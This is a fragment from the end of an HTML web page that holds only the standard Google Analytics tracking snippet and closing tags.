	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
